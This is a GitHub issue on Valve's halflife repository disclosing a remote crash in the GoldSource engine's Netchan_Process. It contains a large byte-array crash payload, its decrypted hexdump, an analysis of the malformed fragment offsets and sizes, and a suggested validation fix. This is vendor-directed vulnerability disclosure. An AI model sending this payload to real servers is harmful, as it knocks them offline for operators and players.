[GoldSource] Netchan_process remote crash server

This shellcode provokes a crash in the server via Netchan_process netchan

public byte[] Netchan_Process = new byte[] { 0xb9,0x6a,0x85,0xca,0xcb,0xeb,0x17,0x91,0x40,0x78,0x7f,0x76,0xb3,0x01,0x13,0xa1, 0xa0,0x01,0x49,0xb8,0xab,0x73,0x48,0x02,0x49,0x5a,0x53,0xff,0x41,0x41,0xe8,0xcb, 0x1c,0x41,0x7e,0xe9,0x88,0x48,0x2c,0x00,0xe8,0xd3,0x42,0x2c,0x00,0x00,0x00,0x41, 0x6e,0x0f,0x84,0x02,0x49,0x2c,0x00,0x2d,0x46,0x56,0x55,0x00,0x00,0x00,0x00,0x50, 0x61,0x0f,0x84,0xfd,0x48,0x2c,0x00,0x68,0x20,0x54,0x65,0x73,0x0f,0x84,0x96,0x48, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x2c,0x00,0x02,0x46,0x54,0x23,0x46,0x52,0x43,0x46,0x54,0x65,0x36,0x40,0x43,0xd6, 0x57,0xc2,0xe6,0x17,0xc2,0x16,0xf7,0x02,0x67,0x92,0xb2,0x37,0x12,0x76,0x97,0xb3, 0x44,0x30,0x73,0x02,0xc7,0x96,0x12,0xb7,0x16,0x82,0x77,0x16,0x17,0xc6,0x16,0xc6, 0xf3,0xe2,0x27,0x91,0xb4,0x02,0x37,0x32,0x13,0x66,0xb2,0xc5,0x82,0x02,0x23,0xe6, 0xc6,0x62,0xb7,0x07,0x63,0x56,0x15,0xe5,0x87,0x46,0x63,0x47,0xe6,0xc6,0x37,0x52, 0x07,0x52,0xb6,0xb7,0x62,0xc6,0x63,0xb2,0x57,0x62,0xe4,0x77,0x43,0x13,0x07,0x13, 0xc2,0x40,0x47,0x52,0x57,0xc6,0xe2,0x17,0xc6,0x16,0xf7,0x26,0xe7,0x96,0xb6,0x97, 0x96,0x76,0x97,0x17,0xc4,0x34,0x77,0xa2,0x43,0x96,0x12,0x13,0x16,0x86,0x73,0x16, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x2c,0x00,0x02,0x46,0x54,0x23,0x46,0x52,0x43,0x46,0x54,0x65,0x36,0x40,0x43,0xd6, 0x57,0xc2,0xe6,0x17,0xc2,0x16,0xf7,0x02,0x67,0x92,0xb2,0x37,0x12,0x76,0x97,0xb3, 0x44,0x30,0x73,0x02,0xc7,0x96,0x12,0xb7,0x16,0x82,0x77,0x16,0x17,0xc6,0x16,0xc6, 0xf3,0xe2,0x27,0x91,0xb4,0x02,0x37,0x32,0x13,0x66,0xb2,0xc5,0x82,0x02,0x23,0xe6, 0xc6,0x62,0xb7,0x07,0x63,0x56,0x15,0xe5,0x87,0x46,0x63,0x47,0xe6,0xc6,0x37,0x52, 0x07,0x52,0xb6,0xb7,0x62,0xc6,0x63,0xb2,0x57,0x62,0xe4,0x77,0x43,0x13,0x07,0x13, 0xc2,0x40,0x47,0x52,0x57,0xc6,0xe2,0x17,0xc6,0x16,0xf7,0x26,0xe7,0x96,0xb6,0x97, 0x96,0x76,0x97,0x17,0xc4,0x34,0x77,0xa2,0x43,0x96,0x12,0x13,0x16,0x86,0x73,0x16, 0x93,0xc2,0x16,0x62,0xf7,0xe6,0x23,0x95,0xb1,0x06,0x33,0x17,0x16,0x66,0xb7,0xc6, 0x83,0x02,0x26,0xe7,0xc2,0x66,0xb6,0x26,0xe7,0x52,0x14,0x41,0x03,0x42,0x67,0xe3, 0x62,0xc6,0x33,0xd6,0x07,0x56,0xb2,0xc8,0x66,0xc6,0x63,0x96,0xd7,0x66,0xe0,0xd7, 0xc7,0x13,0x07,0xb7,0x42,0x44,0x43,0xf2,0xd3,0xc6,0xe2,0xb3,0xc6,0x12,0xf3,0x26, 0x63,0x92,0xb3,0x7b,0x39,0x26,0x6b,0x34,0x28,0x30,0x62,0x2e,0x7c,0x66,0x6b,0x60, 0x26,0x75,0x61,0x0e,0x18,0x74,0x26,0x74,0x7e,0x2c,0x23,0x77,0x68,0x35,0x6b,0x21, 0x36,0x6c,0x26,0x79,0x65,0x36,0x2e,0x07,0x3c,0x71,0x70,0x3b,0x34,0x74,0x04,0x7d, 0x7d,0x6c,0x6e,0x7b,0x6c,0x71,0x2f,0x62,0x76,0x29,0x6b,0x71,0x21,0x67,0x69,0x2b, 0x74,0x53,0x47,0x72,0x3c,0x29,0x61,0x39,0x21,0x78,0x27,0x21,0x79,0x6c,0x61,0x76, 0x7f,0x3e,0x62,0x69,0x1b,0x10,0x23,0x71,0x71,0x26,0x2b,0x7e,0x20,0x70,0x62,0x24, 0x3c,0x66,0x2b,0x20,0x2e,0x35,0x21,0x04,0x58,0x34,0x66,0x34,0x3e,0x7c,0x63,0x35, 0x38,0x65,0x6b,0x71,0x66,0x7c,0x26,0x29,0x75,0x26,0x6e,0x15,0x24,0x71,0x30,0x21, 0x7c,0x84,0x44,0x37,0x35,0x2c,0x6e,0x33,0x2c,0x71,0x6f,0x22,0x76,0x69,0x6b,0x73, 0x69,0x67,0x29,0x61,0x7c,0x13,0x47,0x78,0x74,0x29,0x21,0x73,0x29,0x38,0x27,0x2b, 0x39,0x6c,0x2c,0x27,0x2e,0x22,0x33,0x03,0x50,0x23,0x6b,0x31,0x34,0x65,0x54,0x34, 0x65,0x5c,0x90,0x30,0x62,0x34,0x74,0x66,0x6b,0x6a,0x2e,0x75,0x21,0x04,0x10,0x24, 0x66,0x7c,0x26,0x7c,0x23,0x2f,0x30,0x35,0x2b,0x7b,0x36,0x2c,0x66,0x7b,0x25,0x76, 0x6e,0x47,0x74,0x61,0x70,0x71,0x64,0x74,0x04,0x2d,0x7d,0x7c,0x2e,0x7b,0x74,0x21, 0x2f,0x7a,0x2e,0x39,0x6b,0x29,0x31,0x77,0x69,0x3b,0x64,0x53,0x47,0x62,0xb7,0x17, 0xe2,0xc2,0x63,0x12,0xd3,0x66,0xe4,0xd3,0x46,0x13,0x03,0x16,0xc1,0x44,0x42,0x73, 0xd3,0xc6,0xe3,0xb3,0x47,0x16,0xf3,0x87,0xe6,0x96,0xb7,0x96,0x16,0x76,0x96,0xb7, 0x44,0x30,0x77,0x02,0xc7,0x92,0x12,0xb7,0x13,0x86,0x77,0x13,0x92,0xc6,0x13,0x43, 0xe6,0x22,0x31,0x30,0x06,0x37,0xb6,0x17,0x66,0xb6,0xc7,0x03,0x02,0x27,0x47,0x42, 0x62,0xb6,0x86,0x63,0x56,0x14,0xe5,0x06,0x42,0x63,0xe6,0x63,0xc2,0x36,0xf7,0x83, 0x56,0xb3,0x13,0xe7,0xc6,0x67,0x37,0xd6,0x66,0xe1,0xd6,0x47,0x13,0x06,0x17,0xc2, 0x40,0x43,0x52,0x57,0xc2,0xe2,0x17,0xc2,0x12,0xf7,0x23,0x62,0x96,0xb3,0x12,0x16, 0x72,0x92,0xb7,0x40,0x30,0x77,0x26,0x47,0x96,0x16,0x17,0x97,0x86,0x77,0xb7,0x12, 0xc2,0x17,0xe3,0xf7,0xe6,0x22,0x95,0x30,0x02,0x33,0xb6,0x93,0x62,0xb6,0x63,0x07, 0x06,0x23,0x43,0x47,0x66,0xb2,0xa3,0x66,0x56,0x11,0xe0,0x07,0x42,0x66,0xe7,0x62, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0xc6,0x37,0xd6,0x07,0x52,0xb2,0xb7,0x63,0xc2,0x63,0x93,0x52,0x66,0xe5,0x52,0x47, 0x17,0x02,0x17,0xc6,0x40,0x43,0x76,0xd7,0xc6,0xe6,0xb7,0x47,0x12,0xf7,0x87,0xe2, 0x92,0xb7,0xb2,0x92,0x72,0x92,0x13,0x40,0x34,0x73,0x26,0xc4,0x92,0x16,0xb3,0x93, 0x82,0x73,0xb3,0x17,0xc6,0x13,0xc6,0xf2,0xe6,0x27,0x90,0x31,0x02,0x36,0xb7,0x92, 0x66,0xb7,0x42,0x83,0x02,0x25,0x61,0x56,0x40,0x74,0x66,0x2e,0x76,0x6c,0x63,0x7f, 0x28,0x75,0x6b,0x61,0x7e,0x7c,0x26,0x33,0x7d,0x26,0x2e,0x1f,0x2c,0x51,0x70,0x2b, 0x3c,0x64,0x44,0x77,0x65,0x3c,0x26,0x61,0x34,0x31,0x6f,0x38,0x36,0x79,0x6b,0x39, 0x79,0x77,0x29,0x71,0x64,0x13,0x47,0x62,0x7c,0x29,0x61,0x79,0x21,0x78,0x67,0x21, 0x79,0x3c,0x21,0x76,0x27,0x66,0x62,0x31,0x43,0x10,0x63,0x2b,0x79,0x66,0x6b,0x76, 0x60,0x30,0x62,0x64,0x74,0x76,0x2b,0x6a,0x36,0x25,0x21,0x1c,0x48,0x34,0x66,0x24, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0x36,0x6c,0x23,0x3f,0x20,0x35,0x2b,0x6b,0x36,0x3c,0x66,0x93,0x92,0x41,0x30,0x72, 0x27,0xc6,0x96,0x17,0xb6,0x97,0x82,0x76,0xb7,0x17,0xc2,0x17,0xc6,0xf6,0x62,0x27, 0xb4,0xb5,0x06,0x32,0x13,0x96,0x62,0xb3,0x66,0x87,0x02,0x26,0x63,0x43,0x66,0xb2, 0xa7,0x67,0x56,0x15,0x61,0x86,0x46,0x67,0x46,0x67,0xc2,0x36,0xf3,0x02,0x56,0xb7, 0x92,0x67,0xc2,0x66,0x97,0x53,0x62,0x21,0x73,0x42,0x17,0x03,0x32,0xc7,0x40,0x46, 0x77,0x56,0xc6,0x77,0x16,0x47,0x16,0xf6,0x87,0x97,0x92,0xb7,0x97,0x93,0x76,0x97, 0x32,0xc5,0x30,0x72,0x83,0xc6,0x92,0x13,0xb6,0x13,0x86,0x76,0x13,0x13,0xc6,0x13, 0xc2,0xf9,0x1b,0x00,0x63,0x71,0x69,0x76,0xf6,0x67,0x86,0x06,0x27,0xce,0xc7,0x62, 0xce,0xce };

This shellcode can really crash the server if it is sent by game client after connecting. In decrypted form, it looks like this:

0000 0010:  cf 7f 60 a3 58 03 01 10 01 09 11 19 fb 58 33 00  ..`.X... .....X3.
0000 0020:  06 03 4a b0 72 a8 11 e8 50 6e 01 f7 b9 2c 58 71  ..J.r... Pn...,Xq
0000 0030:  95 52 db 41 b8 10 18 b3 fb c4 17 cd 94 50 64 e8  .R.A.... .....Pd.
0000 0040:  f9 55 06 b5 a9 50 00 e9 44 d4 57 d8 d1 10 74 ab  .U...P.. D.W...t.
0000 0050:  ca 65 4c c3 b1 86 84 ac ff 42 10 95 ab 56 63 ff  .eL..... .B...Vc.
0000 0060:  9c 04 56 ba 6f 03 10 9f ae f6 82 bc bb f7 06 3b  ..V.o... .......;
0000 0070:  8e a2 9a ce 4a 87 6e a1 fb 33 28 e7 0e 42 de 66  ....J.n. .3(..B.f
0000 0080:  ef 77 d2 e5 3f 46 c6 fe 28 77 ba 4a 8b 27 5a 57  .w..?F.. (w.J.'ZW
0000 0090:  7c b2 7e f0 1f 33 02 21 be f7 72 7f 1c 05 16 c8  |.~..3.! ..r.....
0000 00a0:  be 33 56 7e eb 77 96 4f 0e a6 12 ec 0b 63 d6 9b  .3V~.w.O .....c..
0000 00b0:  ce f4 6a fe ea 17 0b f0 ab 07 58 61 ae b2 8e f6  ..j..... ..Xa....
0000 00c0:  df f7 46 35 6e e6 96 0e ae c7 2e 2f 1b 67 6c 27  ..F5n... .../.gl'
0000 00d0:  aa 12 8e a0 ef 63 86 b5 db 56 d2 2a 6c 33 a6 5c  .....c.. .V.*l3.\
0000 00e0:  ee 63 16 48 7f f7 36 bf 5e 36 42 68 9f b6 76 3b  .c.H..6. ^6Bh..v;
0000 00f0:  f8 04 5a 4e 1a 77 5a b0 2f 73 de c1 71 e2 1e a6  ..ZN.wZ. /s..q...
0000 0100:  6f 63 96 95 2e b0 66 3e 0e 57 4b 7e 4b 53 1c a1  oc....f> .WK~KS..
0000 0110:  0a e2 de 30 df e3 12 65 c2 f3 82 da cd 7b 66 92  ...0...e .....{f.
0000 0120:  d7 32 20 d1 d9 2b 36 d5 b7 71 35 cd cd 26 64 e1  .2...+6. .q5..&d.
0000 0130:  ce 33 24 d7 d8 7b 2d db 80 66 74 95 be 7e 7e c4  .3$..{ . .ft..~~.
0000 0140:  c2 70 21 cf 84 54 74 dd c2 3e 34 c4 db 3f 29 8f  .p!..Tt. .>4..?).
0000 0150:  c8 6b 31 95 d2 79 67 82 cb 07 43 cd c0 71 69 97  .k1..yg. ..C..qi.
0000 0160:  d8 77 68 d8 cf 21 3c d0 d0 72 7e 94 c8 23 00 e2  .wh..!<. .r~..#..
0000 0170:  c7 3b 2e d8 dd 72 68 93 d9 6b 7e 9f bd 71 7d 8f  .;...rh. .k~..q}.
0000 0180:  cd 66 64 ab cc 33 7c d7 c8 3b 3d 81 90 36 24 85  .fd..3|. .;=..6$.
0000 0190:  ac 6e 3e 96 d8 20 71 87 8e 04 94 c5 ca 7e 6c 9e  .n>...q. .....~l.
0000 01a0:  db 3f 61 d5 ca 2b 39 df d8 39 27 82 c1 47 03 85  .?a..+9. .9'..G..
0000 01b0:  ca 31 21 dd d2 37 20 9a de 6c 74 9a ba 63 6a 8f  .1!..7.. .lt..cj.
0000 01c0:  c8 6b 73 a3 cd 04 65 dd 89 c0 04 dc df 64 6c 81  .ks...e. .....dl.
0000 01d0:  cc 2e 72 88 dd 00 04 82 c5 66 6c df cc 20 6f 88  ..r..... .fl...o.
0000 01e0:  d5 66 6b d2 cf 65 2b cf d8 64 07 85 cd 64 61 89  .fk..e+. .d...da.
0000 01f0:  c5 6d 25 ad d8 64 63 9d c0 6e 62 8c ce 61 61 ca  .m%..dc. .nb..aa.
0000 0200:  aa 64 6b 9a ee e7 62 ae ab 33 9a 5b 6a f4 3e 30  .dk...b. .3.[j.>0
0000 0210:  af 03 0b a5 8a 52 44 62 0a a3 d6 6a 7e e3 56 ec  .....RDb ...j~.V.
0000 0220:  6f e7 86 1f 0e d6 26 bf bb 67 70 af 0e 12 82 3e  o.....&. .gp....>
0000 0230:  aa 67 8e ba ba 03 de 21 c9 71 3a 45 ae e6 7f a7  .g.....! .q:E....
0000 0240:  fa c7 e6 95 bb 17 27 eb da d6 ee db bf f5 4c b5  ......'. ......L.
0000 0250:  da e6 7b a1 7a e7 36 61 5e 53 a3 ef 2f 27 27 6d  ..{.z.6a ^S../''m
0000 0260:  be 86 f1 9f 7b 57 56 ba ee 42 03 ab 7b 17 f2 3b  ....{WV. .B..{..;
0000 0270:  db 33 ff bb ef 02 ab 25 b9 f7 8a d1 fe 76 3f 91  .3.....% .....v?.
0000 0280:  6e 17 46 65 eb e7 77 6f 4e b3 4f 7b 89 85 7a 05  n.Fe..wo N.O{..z.
0000 0290:  2a b6 2b e1 fe 73 b6 c1 fe 03 33 bf 9f b3 f2 cd  *.+..s.. ..3.....
0000 02a0:  fe b0 01 af db a7 36 eb be c6 77 2d da b7 a2 ab  ......6. ..w ....
0000 02b0:  eb 83 6b 6b be 42 fd d5 3f 57 1a b4 6e 26 0b e1  ..kk.B.. ?W..n&..
0000 02c0:  be b7 b6 35 1b d7 f7 fb 2b e2 ef 2b f9 03 ca 91  ...5.... +..+....
0000 02d0:  7d 26 6b d7 6a a3 16 31 ae f3 63 3b 0b d6 53 6d  }&k.j..1 ..c;..Sm
0000 02e0:  c8 c0 37 1f 2b f7 66 ab 3a 52 f7 8d ef 61 35 fb  ..7.+.f. :R...a5.
0000 02f0:  97 76 7c e9 86 73 74 c5 98 2b 6d 8b 8a 76 34 df  .v|..st. .+m..v4.
0000 0300:  e6 2e 76 8e d2 20 51 c5 ce 14 3c 85 d8 36 64 86  ..v...Q. ..<..6d.
0000 0310:  81 6f 29 d7 c0 7b 79 95 c8 69 67 c0 9b 57 53 cf  .o)..{y. .ig..WS.
0000 0320:  80 31 39 85 98 27 28 88 cf 31 7c 92 88 62 76 de  .19..'(. .1|..bv.
0000 0330:  92 73 18 ea 8f 7b 7e ca 9d 22 28 c3 d3 7b 3e d5  .s...{~. ."(..{>.
0000 0340:  e5 21 75 c5 dd 36 34 a1 86 73 34 8f d2 3b 6d c3  .!u..64. .s4..;m.
0000 0350:  2a 66 24 d5 8b 20 41 31 ae d6 d6 9e 8f 92 d7 1d  *f$...A1 ........
0000 0360:  ee 92 07 4e 9e 22 a6 6f 8b 16 f5 5f 0a 62 86 ea  ...N.".o ..._.b..
0000 0370:  9f 12 8f cf 4b 76 5b d0 ec 16 7f 04 de 16 ce c0  ....Kv[. ........
0000 0380:  cf c2 37 b5 4e 06 02 1a df 92 3f 2b 98 72 0b 74  ..7.N... ..?+.r.t
0000 0390:  ba 17 5a 90 bf 50 c7 91 ce 86 46 ce 0f 06 07 bd  ..Z..P.. ..F.....
0000 03a0:  4e c2 87 7e 2e 36 c3 3e cb 20 85 d9 aa 92 d6 7a  N..~.6.> .......z
0000 03b0:  cf 96 1b 1f ea d6 0b a0 f9 5b e1 61 cf 39 39 c2  ........ .[.a.99.
0000 03ba:  ff 86 37 05 9b 97 ce ce ce ce                    ..7..... ..

In fact, it is a multifragment containing two fragments - normal and file. We now turn to analysis of structure of fragments: cf - flag indicating the presence of a normal fragment in packet; 7f 60 - total number of fragments in stream of normal fragments (24703); a3 58 - current fragment in stream of normal fragments (22691); 03 01 - normal fragment offset (259); 10 01 - normal fragment size (272); 09 - flag indicating the presence of a file fragment in packet; 11 19 - total number of fragments in stream of file fragments (6417); fb 58 - current fragment in stream of file fragments (22779); 33 00 - file fragment offset (51); 06 03 - file fragment size (774); Next are the bodies of fragments.

According to my observations, a server crash occurs due to incorrectly set offset fields (offset of file fragment should not be less than offset of normal fragment, since it follows it) and sizes of fragments, due to which data reading goes beyond the packet. It seems that needs to add additional checks in Netchan_Validate. You can see them here: https://github.com/dreamstalker/rehlds/blob/65c6ce593b5eabf13e92b03352e4b429d0d797b0/rehlds/engine/net_chan.cpp#L648-L673

@mikela-valve I can provide an exploit that using this vulnerability if it is needed, because it cannot be done through a pure game client.

ValveSoftware / halflife

[GoldSource] Netchan_process remote crash server #2139